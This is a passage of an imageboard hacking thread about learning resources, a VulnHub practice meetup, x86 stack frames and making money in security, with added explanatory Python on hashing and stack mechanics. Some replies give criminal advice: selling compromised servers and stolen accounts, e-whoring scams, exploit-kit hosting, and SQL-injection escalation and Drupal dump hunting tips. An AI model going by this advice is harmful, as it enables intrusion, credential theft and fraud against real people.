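    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    digest, nonce = commit(b"constructed: I hold the files")
    print("post this now:", digest)
    print("reveal later :", nonce.hex(), "+ message")
    print("checks out   :", reveal_ok(digest, nonce, b"constructed: I hold the files"))
```

A commitment only proves the poster held the message at posting time; it says nothing about whether the message is true, and a digest posted without the nonce cannot be checked by anyone until the poster chooses to reveal.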




The idea of known plaintext attacks is known in /general/, but they are highly specific to the protocol. So no, there's plenty to see here. Especially if this were to affect Diffie-Hellman ephemeral keys.



What are you guys currently studying?



Currently I am studying router firmware that is not traditionally susceptible to WPS pixie attacks and attempt to narrow down places where the generation of entropy is misused. Then make them available to auditing through pixie wps



Trying to find a decent resource to learn MySQL.



Would anyone be interested in a get together, tomorrow?

We could all download a machine from vulnhub and try to attack it, and help each other out on a irc chat.

Would that sound interesting?



Are most people from this board/chan in a specific city? I always see threads about going out together.



No, i mean we would all set it up locally, then we would talk on an IRC room!

each person would set up a lab
all agree on a machine to download locally and attack.

we would meet in an IRC room to talk and help each other out!



Oh, i see. I'd love to go but i don't really have the experience for that yet. Good luck though!



That's the thing though! WE would HELP each other! people don't get started or quit half way through, but when they have a mentor or a group to help them they're much more likely to a) finish b) get better faster!



Well, sure, i could get together. I'm still studying assembly and C, i've worked a few years with java but i wouldn't even know how to begin an attack.
If anything i'll just watch.



We will start something easy!
It's not like we are going to just start off with bsd Locked down with ipfw or anything,



Sounds fun.



File: 1470546311289.jpg (748.53 KB, 1536x1152, 4:3, 6c16a50b02dc4272a5130fbc67….jpg)

Around what time are you thinking?



For anyone learning assembly "Programming from the ground up" is a great introduction to computer architecture and assembly.
It assumes you don't even know how to code in any language.



I set up the IRC
default port



forgot to add I will be in pretty much all day!






Why not?



blocks tor



Just use pidgin behind a proxy



>behind a proxy
I've got a list of 50k socks proxies, about 50% done, all blocked so far. This might take a while.



Are you checking both version 4 and 5 of the socks protocol



File: 1470607233289.png (92.67 KB, 1363x213, 1363:213, 2bSNPQ7.png)

The fuck




Yeah, that's not safe or anon. There's plenty of IRCs with tor hidden services. Here's one: https://cyberguerrilla.info/ways-to-connect-to-cyberguerrilla-irc/

>>299 Probably an md5 checksum for a file he sent to someone that he did not want to link directly to the checksum. Once the end user confirmed the complete uncorrupted xfer of the file, they deleted the checksum.
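The two uses of a bare published hash discussed in this thread, a commitment to a file you will reveal later (the "claim authorship of an upcoming leak" post) and a transfer checksum the receiver deletes once the file has arrived intact (the reply above), are the same mechanism seen from two sides. The following is an added Python example, not code from the thread; the document bytes and the salt are constructed here. It shows why the commitment should be salted: without a salt, anyone who can guess the content (a short message, a file that is already public) can confirm the guess by hashing it themselves.

```python
import hashlib
import hmac
import os


def commitment(content: bytes, salt: bytes) -> str:
    """Hash commitment: publish this digest now, reveal content + salt later.

    The salt is kept secret until the reveal, so the published value tells
    observers nothing even when the content itself is low-entropy or
    guessable.  Publishing the hash proves you held the content at that time.
    """
    return hashlib.sha256(salt + content).hexdigest()


def open_commitment(published: str, content: bytes, salt: bytes) -> bool:
    """Verify a reveal against the digest published earlier.

    compare_digest avoids a timing side channel on the string comparison.
    """
    return hmac.compare_digest(commitment(content, salt), published)


def transfer_checksum(content: bytes, algo: str = "sha256") -> str:
    """Integrity digest for a transferred file.

    md5 is still fine for detecting accidental corruption in transit, but it
    is not collision resistant, so use sha256 when a third party could
    substitute a different file carrying the same digest.
    """
    return hashlib.new(algo, content).hexdigest()


def verify_transfer(content: bytes, expected: str, algo: str = "sha256") -> bool:
    """Receiver side: compare the bytes that arrived with the sender's digest."""
    return hmac.compare_digest(transfer_checksum(content, algo), expected)


def guessable_without_salt(content: bytes) -> bool:
    """Why the salt matters: an unsalted commitment to guessable content can be
    confirmed by anyone who hashes the same guess."""
    unsalted = hashlib.sha256(content).hexdigest()
    attacker_guess = hashlib.sha256(content).hexdigest()
    return unsalted == attacker_guess


# Constructed sample data, not a real document.
DOCUMENT = b"constructed sample leak text, not a real document\n"
SALT = os.urandom(16)

if __name__ == "__main__":
    published = commitment(DOCUMENT, SALT)
    print("published now:", published)
    print("reveal verifies:", open_commitment(published, DOCUMENT, SALT))
    print("tampered reveal:", open_commitment(published, DOCUMENT + b"!", SALT))
    print("transfer ok:", verify_transfer(DOCUMENT, transfer_checksum(DOCUMENT)))
```

Usage: publish `commitment(DOCUMENT, SALT)` somewhere timestamped, keep `SALT` and the file private, and later release both so anyone can run `open_commitment`. The transfer-checksum pair is the same digest without the secret salt, which is why it proves integrity but not authorship.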



I'm studying like a motherfucker. Networks, security, C++, C, Assembly etc.. I really love this stuff, not only security but the whole low level optimization/elegant software development.

But how can i make money out of that?
I mean sure it's great to be good at something, but i had really serious psychological problems working at a company (fullstack dev) before, and i don't see many remote options in the infosec area.

Any lainons here make money remotely? How do you do it, freelancing? Bug bounties?

Doesn't seem like i could pay the bills with bug bounties for example. Not consistently at least.



u should just marry me instead



just spam and seo for ad revenue. you can make a lot of money, if you are good at what you do



That isn't websec, my question is how to make money in a websec position. I could just freelance as a webdesigner to make a few bucks to buy food, it's what i do right now, but i don't wanna do that stuff for long.




how would one do that?




Seems like a good course. You learn how to create a SO from scratch, it's free, just go to "preview course"



e-whoring is pretty good, ask for money from desperate people, if you don't mind hurting people's feelings you can get a lot and most police agencies would laugh if they tried to report you



pastebin of resources from /r/how_to_hack



Not only is that really fucked up, i can't see how that can be related to hacking in any way.



Hey, thanks. There's a lot of good material in there. There's a magnetic link for a shit ton of books from IT books, now that it's dead, it'd be good if people seeded it.




Holy shit it books is back, just checked it.




Holy shit dude. Thank you for this link. Is there a way to download all of the books, or are we talking hundreds of books in this site?

Do you have any recommendations to download? Other than me downloading some more books on other languages.

Another thing - are there any other forums/boards/IRC that you guys frequent, that seem to be somewhat active? I've tried several different channels but with no real luck. I've also tried the Defcon groups, but a lot of the cities surrounding me are deader than a doornail.



I just posted a magnetic link for 1800 books from it books, i'm pretty sure it's not all of them, but it's a huge chunk.

And the recommendations depends on what you wanna do really, i'd recommend downloading /g/entooman's library if you want a collection. If you're into hacking, you should learn assembly, c and c++, then network.

A good starting point is the book "Programming from the ground up" for assembly, "The C programming language, 2nd edition" for C, and "The C++ programming language, 4th edition" for c++. While you read those books you can watch cybrary's A+ course.

After that you should have a better understanding of the field and an idea of where to go.

I'm not a part of any irc channel, can't help with that.



Making money the blackhat way isn't just one thing, because you never know what you can find on servers. Not all of them have a ready btc wallet you can steal, instead you have to think outside of the box a little. You can sell the roots, or sell the box as-is to drive-by exploit hosters. Grabbing the accounts, testing for password reuse in other services and selling the accounts for example netflix work too.



But this thread isn't about that, dude. If you have to do stuff that isn't related to the point of this thread, then it's not really relevant isn't it?

Hacking mentality can be applied to even sex, but we shouldn't be talking about sex here.



>But this thread isn't about that, dude.
Oh, I thought this was a
>Hacking General

If you wanna follow your passion on the whitehat path, you can do what thousands of others are doing right now. Get a small crew together with various skills start your own firm and wait for pentesting offers.

Then starve to death because nobody will hire you over the 100 already established, well known firms.



I apologize, i thought you were the one talking about "manipulating people to get money" in the most generic possible way.

I'm not looking for anything blackhat though, i'm asking how i can make reliable money, stealing is hardly reliable to pay monthly bills and buy food.



The whitehat side of things is pretty dry of money atm, unless you are going to do bug bounties. They are not really what you'd call a reliable source of income either.

You can make reliable bucks via blackhat methods, mostly by things related to CCs and money transfers, but you need reliable contacts and a lot of hard work to actually build and manage your botnet empire.

If you want to ditch the "security" aspect and focus on "anything computer related" though, you can find lots of gigs doing freelance programming. The gigs might not be that interesting, as they are usually about "write this specific part of the program/library", but they can keep you fed.

I do ad stuff, PTC and CPA things, they can get you decent cash, but they need to be handled like a full time job instead of a neat little side project.



Yeah, right now i'm freelancing for whatever people pay me to do (make a page out of a CVS file, setup or fix a wordpress page, etc..). But this kind of work is really draining me, i don't like front end and it's a horrible chore.

Security doesn't seem to be viable as a profession for a remote worker though, so i might try to land a remote software engineer job, while it's not ideal, it's better than what i do right now. Thanks for your info though.



>Then starve to death because nobody will hire you over the 100 already established, well known firms.
Then you ought to make a name for yourself and your firm , if you dig what I mean
*wink* *wink* *nudge* *nudge*



File: 1470944744351.png (46.77 KB, 150x150, 1:1, 1470599731730.png)

I'm learning assembly right now and i feel dumb as fuck. I'm not asking for more resources, i have plenty, i'm just frustrated i guess.

I was keeping up with the book i'm reading (programming from the ground up with assembly x86), but when i reached functions holy shit i'm lost as fuck.

Sure if i read the code line by line i'll be able to understand what it does, but in no way would i be able to create a simple function in assembly. What the fuck man..



if you've been keeping up you shouldn't have an issue with functions.



He's using a C standard for stack calling, it's not just the random declaration of a function. It's getting clearer now, but just the fact that it took me a whole day to get it right is pretty disappointing.



Hey, can someone clarify something for me regarding x86 assembly programming?

If i do pushl %ebp, the contents of %ebp will be both at the %ebp register and at the top of the stack in memory, correct? And if i override %ebp i just have to refer to %esp whenever i wish to retrieve the previous value of %ebp, correct? Of course i can override %esp too, but what i'm trying to get to is that the same information will be at different parts of the computer at once (a memory location and a register). Is that assumption correct?

Also, the stack is a place in memory where i keep temporary information about a function, right? It's a place in memory just like a variable, except it follows different rules and has a different purpose, but essentially it's a place where i will put (specific) stuff, and then retrieve it, except that the system expects me to follow certain rules otherwise it won't be able to work(go back to who called a specific stack frame), correct?



>the same information will be at different parts of the computer at once (a memory location and a register). Is that assumption correct?
yes, push is like a mov, except it also moves the stack pointer to point to the value most recently pushed

>Also, the stack is a place in memory where i keep temporary information about a function, right?

the stack is where you keep variables
if you want dynamic memory allocation use a heap manager.
you're wrong in thinking that there are any rules imposed by the architecture itself.
the operating system might however prevent you from accessing memory in certain pages for example, for security reasons.



>you're wrong in thinking that there are any rules imposed by the architecture itself.
Not directly, but if i don't have the return value of my stack frame, i won't be able to go back to whatever function called me right? It's not a physical rule, but i have to "agree with it", don't i?
Thanks a lot for the info, it helped a lot.



if you use call to call a function, the return address will be automatically added to the top of the stack.
you can return to that address with ret at any point as long as the pointer is at the top of the stack
but yeah, like if you shrink the stack or overwrite that value you'll probably be in trouble
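The exchange above (pushl %ebp leaving the old value in both the register and memory, call pushing the return address, ret popping it blindly) is easy to check by modelling the stack rather than staring at a listing. The following is an added Python model written for this thread, not code from the book or from anyone posting here; it is not an emulator, just three registers and a word-addressed memory, and every address in it (the initial %esp, the caller's %ebp, the callee and return addresses) is a constructed placeholder. The last function also shows the "you'll be in trouble" case, with a shadow-stack style check a defender would use to notice the clobbered return slot before ret consumes it.

```python
WORD = 4              # one 32-bit stack slot
STACK_TOP = 0x1000    # constructed initial %esp; the stack grows downward
CALLER_EBP = 0xBEEF0000   # constructed: the caller's frame pointer value
CALLER_RET = 0x08048105   # constructed: instruction after the caller's `call`
CALLEE = 0x08048200       # constructed: callee entry address


class CPU:
    """Tiny model of the x86-32 stack: %esp, %ebp, %eip and a memory dict."""

    def __init__(self) -> None:
        self.esp = STACK_TOP
        self.ebp = CALLER_EBP
        self.eip = 0
        self.mem: dict[int, int] = {}

    def push(self, value: int) -> None:
        """pushl: move %esp down one slot, then store the value there."""
        self.esp -= WORD
        self.mem[self.esp] = value

    def pop(self) -> int:
        """popl: load the word at %esp, then move %esp up one slot."""
        value = self.mem[self.esp]
        self.esp += WORD
        return value

    def call(self, target: int, return_addr: int) -> None:
        """call: push the address of the next instruction, jump to target."""
        self.push(return_addr)
        self.eip = target

    def ret(self) -> None:
        """ret: pop whatever is on top of the stack into %eip, no questions asked."""
        self.eip = self.pop()


def prologue(cpu: CPU) -> None:
    """pushl %ebp ; movl %esp, %ebp"""
    cpu.push(cpu.ebp)
    cpu.ebp = cpu.esp


def epilogue(cpu: CPU) -> None:
    """movl %ebp, %esp ; popl %ebp ; ret"""
    cpu.esp = cpu.ebp
    cpu.ebp = cpu.pop()
    cpu.ret()


def saved_ebp_in_register_and_memory() -> tuple:
    """After `pushl %ebp` the old value is at (%esp) AND still in %ebp; after
    `movl %esp, %ebp` it survives only in memory, reachable as 0(%ebp)."""
    cpu = CPU()
    old_ebp = cpu.ebp
    cpu.push(cpu.ebp)                               # pushl %ebp
    both_places = cpu.mem[cpu.esp] == old_ebp == cpu.ebp
    cpu.ebp = cpu.esp                               # movl %esp, %ebp
    still_in_memory = cpu.mem[cpu.ebp] == old_ebp   # 0(%ebp): saved ebp
    return both_places, still_in_memory


def call_and_return(corrupt_return_slot: bool = False) -> tuple:
    """call -> prologue -> locals -> epilogue -> ret.

    Returns (where %eip lands, caller's %ebp restored?, return slot intact?).
    The shadow list records the address `call` pushed so it can be compared
    with 4(%ebp) before ret trusts it, the same idea as a hardware shadow stack.
    """
    cpu = CPU()
    shadow = []
    cpu.call(CALLEE, CALLER_RET)
    shadow.append(CALLER_RET)
    prologue(cpu)
    cpu.esp -= 2 * WORD            # subl $8, %esp: room for two locals
    cpu.mem[cpu.esp] = 0           # -8(%ebp)
    cpu.mem[cpu.esp + WORD] = 1    # -4(%ebp)
    if corrupt_return_slot:
        # A write that runs past the locals reaches 4(%ebp), the return address.
        cpu.mem[cpu.ebp + WORD] = 0x41414141
    slot_intact = cpu.mem[cpu.ebp + WORD] == shadow[-1]
    epilogue(cpu)
    return cpu.eip, cpu.ebp == CALLER_EBP, slot_intact


if __name__ == "__main__":
    print(saved_ebp_in_register_and_memory())      # (True, True)
    print(hex(call_and_return()[0]))                # 0x8048105, back to the caller
    print(hex(call_and_return(True)[0]))            # 0x41414141, ret went elsewhere
```

Note that ret itself never checks anything; it only pops. That is why the saved %ebp and the return address have to be where the convention says they are when `movl %ebp, %esp` runs, and why a stack that is shrunk the wrong amount, or a local written past its bounds, sends execution somewhere the caller never intended.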





First time posting, hopefully this is the first time this is posted here, here are a bunch of e-books :)




File: 1471095511515.png (85.31 KB, 1593x360, 177:40, B9MG8ac.png)

Is "The C programming language" really this poorly written, or did i download an unrevised version? I've seen some pretty sloppy code examples too, with poorly named variables that don't do anything, a bunch of expressions in a single line, etc..



It's just another form of spam and spread virus,



Fowking hell m8, since when did drupal update their password hashing policy? I'm getting 1639 H/s on a single hash.

Kill me now desu senpai.



File: 1471119379366.png (173.13 KB, 500x548, 125:137, anime-beautiful-cute-girl-….png)

So I just started some of Cybrary's classes, and as a fledgling programmer that's self-taught I know I got some holes in my knowledge. Information security is something I have become actively interested in, so I started shit from the ground up.

I'm starting with CompTIA A+ and I am noticing the lectures are really, really short. I'm assuming that Cybrary's resources are more overviews (as well as some of these classes) for more thorough resources?

Reason I ask this is that when I compared Cybrary's course to CompTIA versus the actual book (~1200 pages) and people telling me they studied for months, I am feeling it can't possibly that easy to pass. Unless I'm just realizing I know a lot it's already talking about?

Anyway, just looking to actually learn, but be proficient with my knowledge, than base overviews. Any suggestions would be aaaaaaace.



ComptiA has 43 hours of material. You can read 1200 pages in far less than 43 hours.

I watched all comptiA classes, but i've never had any interest in certifications (since i don't have the cash for that). There was some bullshit, but overall the first half of the classes were great.

I wouldn't recommend you to study just from there though, try to study 2, 3 or as many subjects as you can at the same time, otherwise you will likely be bored or frustrated when you hit a tough/uninteresting subject.

Good luck.



A+ is trivially easy. This will not be like anything you learned at school. A+ is mostly about memorizing details, only in the networking portions does it become in any way theoretical. The reason why the lectures are so short is because, in addition to the simplicity of A+, the course is meant to be supplemented with your own study. This may include going over recommended reading material, finding a checklist of exam topics and if you're cheeky, going over brain-dumps.

Personally, unless you actually want the cert for employment or extra credits in a course (and there is nothing wrong with that), you may just want to do the cybrary side of things because A+ is quite mind numbing and will set you back nearly $200 for the actual exam.

I recently took the CCNA course at cybrary, and I am still studying but, cybrary was a great starting point. From memory the course materials tab will have a bunch of text books which you may wish to "acquire" should you want to attempt the exam. >>360



Is this thread in autosage?



It is. What's up with that?



At what point do you guys join wargames and puzzles? I've been studying C,C++ and assembly for a while and i've worked for over a year with front end dev.
I tried doing hackthissite's first tutorial, it only asks you to know HTML, yet i have no idea how to bypass it. 0 clue.
I'm not asking for answers, as that would defeat the whole purpose of a puzzle, but what should i study? Are there any books, courses or introductions you guys have done previously that helped you crack these challenges?



We had set up an IRC channel, rizon #lainhackgen
That being said, hackthissite challenges answers and clues are in the forums and are probably much better

That being said, we set up #lainhackgen to work together to break into machines and help each other get better but it hasn't really caught on

(also sleepz if you're lurking, i beat that vm, thanks for the hand!)



>At what point do you guys join wargames and puzzles?
ASAP, there are wargames for everyone, and you will never know every little thing, and the best way to learn is in a wargame that way you can apply it!
> Are there any books, courses or introductions you guys have done previously that helped you crack these challenges?
I do enumeration and see what exploit / vulns / etc. Are out there to test out.

The most important advice is DONT GIVE UP.



I'm not giving up, but i just found out MIT'S free course on computer science. I'll be doing that alongside cybrary, i always wanted to have a proper, solid foundation on programming and computer science.
I study a lot so it shouldn't take more than a month or two for me to finish the whole course. Thanks a lot for your help by the way.



By the way, their course is insanely great. They teach electronic engineering plus computer science. All the material and exercises are provided for you.





>>109 (OP)
what are some useful methods of obscuring your location? use a box you've already compromised? pay for a vpn (seems untrustworthy)? utilize tor and friends?



>use a box you've already compromised? pay for a vpn (seems untrustworthy)? utilize tor and friends?
These are all good things
If you use a vpn make sure x doesn't have access to it, Not that i would know or anything.



Well, I will share how exploit kits like angler are usually employed.

Typically the EK will be served/controlled from a compromised wordpress, hopefully in a legally difficult country. The real command and control will come via tor communications with this compromised site.

Sometimes people develop very long chains of proxies, and vary up the exact chain on a week to week basis, just to evade analysis.

Keep in mind, somehow someone has to make a direct attack on the original server, as serving many exploits over tor is a huge pain in the ass. Not saying people don't do it, but it's a huge pain in the ass and easy to fuck up.

Criminal groups (like those running angler) get away with the initial break in by having already established groups of compromised computers in legally obscure zones, where getting forensics teams in is a no go.

Also, I might add that any server that has an easy to use wordpress exploit is almost guaranteed to be infected with this sort of shit. There are bots that scan the entire ip4 range just looking for shitty wordpress installs.

I have rambled too long.



How would you go about dumping the users of a mysql server?

I found an injection point but I lack the privileges to access the user table.

How is this normally done? Should I look for exploits for that specific mysql version or can it be done with injections alone?



Hi lainons, I want to buy a tp-link tl-wn722n for pentesting wireless routers.
I want to know your opinion ( it supports packet injection and monitor mode, so the aircrack-ng suite will work )



I have one. It's good, but only does 150MBs. The ath9k driver is real easy to work with, should work fine for wifi pen testing.



If you can't learn it on the spot as you're doing it you're not a real hacker.




what privs do you have? check for outfile and others to see if you have write/read access. Pull in source files if you can to see hard coded passwords, or write to disk and overwrite the admin page.



Since version 8. Protip, the migration tool for drupal from 7 -> 8 is often misconfigured. The .sql files are (often) written to a traversable directory. Look into google dorking or directory fuzzing.
